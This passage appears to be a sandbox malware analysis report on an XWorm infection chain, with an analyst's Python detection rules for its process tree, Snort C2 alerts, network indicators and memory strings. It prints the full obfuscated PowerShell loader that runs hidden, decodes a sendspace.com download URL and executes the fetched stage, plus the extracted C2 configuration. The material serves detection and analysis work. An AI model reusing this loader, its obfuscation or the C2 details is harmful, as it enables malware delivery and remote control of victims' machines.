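CONCAT_BUILD = re.compile(r"\$(\w+)='[^']*';\$\1\+='")
# $object.$methodName.Invoke(  -> method resolved at run time from a variable
DYNAMIC_INVOKE = re.compile(r"\$\w+\.\$\w+\.Invoke\(")
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
APPDATA_ECHO = re.compile(r"\becho\s+%appdata%", re.I)
# Binaries the loader is known to hollow; wab.exe is the one this report shows.
# Extend from your own telemetry (assumption: the list is maintained by the analyst).
INJECTION_HOSTS = {"wab.exe"}

PROCESS_EVENTS = [  # constructed from the report's process tree
    {"pid": 6480, "ppid": 0, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "'},
    {"pid": 5092, "ppid": 6480,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){...$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}...;Smrkers $Alvan;"'''},
    {"pid": 500, "ppid": 5092, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"'},
    {"pid": 5144, "ppid": 5092,
     "image": r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';...;Smrkers $Alvan;"'''},
    {"pid": 2268, "ppid": 5144, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"'},
    {"pid": 2948, "ppid": 5144, "image": r"C:\Program Files (x86)\windows mail\wab.exe",
     "cmdline": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
]


def _name(path):
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return {pid: sorted list of tags} for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}

    def tag(pid, label):
        findings.setdefault(pid, []).append(label)

    for e in events:
        name, cmd = _name(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pname = _name(parent["image"]) if parent else ""
        if name == "powershell.exe":
            if CONCAT_BUILD.search(cmd) or DYNAMIC_INVOKE.search(cmd):
                tag(e["pid"], "powershell_obfuscated_cmdline")
            if HIDDEN_WINDOW.search(cmd):
                tag(e["pid"], "powershell_hidden_window")
            # 64-bit PowerShell launching the SysWOW64 copy: the loader needs a
            # 32-bit host for the next stage.
            if (pname == "powershell.exe"
                    and "\\syswow64\\" in e["image"].lower()
                    and "\\syswow64\\" not in parent["image"].lower()):
                tag(e["pid"], "powershell_bitness_downgrade")
        elif pname == "powershell.exe":
            # PowerShell shelling out to cmd.exe only to expand %appdata%.
            if name == "cmd.exe" and APPDATA_ECHO.search(cmd):
                tag(e["pid"], "cmd_resolves_appdata_for_powershell")
            if name in INJECTION_HOSTS:
                tag(e["pid"], "powershell_spawned_" + name)
    return {pid: sorted(tags) for pid, tags in findings.items()}


if __name__ == "__main__":
    for pid, tags in sorted(analyze(PROCESS_EVENTS).items()):
        print(pid, ", ".join(tags))
```

Run against these events, the rules tag both PowerShell instances as obfuscated, the first as hidden-window, the second as a bitness downgrade, both cmd.exe children as `%appdata%` resolution on PowerShell's behalf, and wab.exe as a PowerShell-spawned injection host; the initial cmd.exe that ran zap.cmd trips nothing, which is the expected shape of the chain. In production the same logic maps onto Sysmon Event ID 1 fields (`Image`, `ParentImage`, `CommandLine`), and the bitness check is a cheap, low-noise addition to the usual PowerShell rules.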
Snort alerts (timestamp | SID | source port -> destination port | protocol | classtype):
05/23/24-21:14:15.572246 | 2852923 | 49724 -> 8896 | TCP | A Network Trojan was detected
05/23/24-21:14:15.571396 | 2852870 | 8896 -> 49724 | TCP | A Network Trojan was detected
05/23/24-21:13:17.087470 | 2855924 | 49724 -> 8896 | TCP | A Network Trojan was detected
05/23/24-21:14:05.945641 | 2852874 | 8896 -> 49724 | TCP | A Network Trojan was detected


AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
(This string sits in powershell.exe memory next to the other Pester module-manifest URLs listed under Networking, github.com/Pester/Pester and the Apache 2.0 licence link; it is a reputation hit on a benign PowerShell module artefact, not a URL the sample contacted. The sample's own network activity is the sendspace.com downloads and the duckdns.org C2.)
Source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["tbsagyw.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49721 version: TLS 1.2
PDB paths found in memory (these belong to the PowerShell/.NET host assemblies, not to the payload):
Source: Binary string: m.Core.pdb | source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ | source: powershell.exe, 00000006.00000002.2614520211.0000000008120000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb | source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdb( | source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb | source: powershell.exe, 00000006.00000002.2614936555.0000000008173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb' | source: powershell.exe, 00000006.00000002.2591214496.00000000029EC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

Networking

Source: Traffic | Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8896 -> 192.168.2.6:49724
Source: Traffic | Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8896 -> 192.168.2.6:49724
Source: Traffic | Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49724 -> 12.202.180.134:8896
Source: Traffic | Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.6:49724 -> 12.202.180.134:8896
Source: Malware configuration extractor | URLs: tbsagyw.duckdns.org
Source: unknown | DNS query: name: tbsagyw.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.6:49724 -> 12.202.180.134:8896
Source: Joe Sandbox View | IP Address: 69.31.136.17
Source: Joe Sandbox View | IP Address: 12.202.180.134
Source: Joe Sandbox View | IP Address: 104.21.28.80
Source: Joe Sandbox View | ASN Name: FISERV-INCUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pro/dl/jj4uw4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs03n4.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/ug8lu5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: fs03n1.sendspace.com | Connection: Keep-Alive | Cookie: SID=o97eha0u97md48nbbdbvhl8653
The two sendspace.com fetches are separate stages: the Polyfon.csv URL appears only in powershell.exe memory (strings below), so it is requested by the PowerShell stage, while the .bin URL appears only in wab.exe memory, so it is requested by the injected wab.exe process. The Firefox User-Agent is a hard-coded string in the PowerShell script, not a browser. tbsagyw.duckdns.org:8896 is the C2 from the extracted XWorm configuration; the TCP session to 12.202.180.134:8896 follows the DNS query for that name and carries the check-in and ping exchange the Snort rules matched.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs03n4.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs03n1.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: tbsagyw.duckdns.org
Source: powershell.exe, 00000003.00000002.2727560719.0000024C5956B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs03n4.sendspace.com
Source: powershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2727560719.0000024C59533000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspace.com/
Source: wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdyku
Source: wab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspace.com/v
Source: wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n1.sendspace.com/y
Source: powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspaX
Source: powershell.exe, 00000003.00000002.2727560719.0000024C57C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspace.com
Source: powershell.exe, 00000003.00000002.2727560719.0000024C59554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C57C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C57C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv
Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Of the strings above, only the sendspace.com and duckdns.org entries reflect the sample's own activity. The contoso.com, nuget.org, aka.ms/pscore and schemas.xmlsoap.org strings are resident PowerShell/.NET module-manifest and help text, and the Pester and Apache licence URLs come from the Pester module manifest; none of them were contacted during the run.
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C58BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C5906B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/%I8V
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/jj4uw4P
              Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/jj4uw4XR
              Source: wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3374313577.0000000022840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ug8lu5
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49721 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_5144.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5092, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5144, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6216
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6240
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3466B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3466AB16
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443E5E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0273712A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0273D504
              Source: amsi32_5144.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5092, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5144, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.evad.winCMD@13/9@4/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Innumerable.Sno
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\MFUu6tulv9qAMMHj
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhdutsjh.vxt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5092
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5144
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme 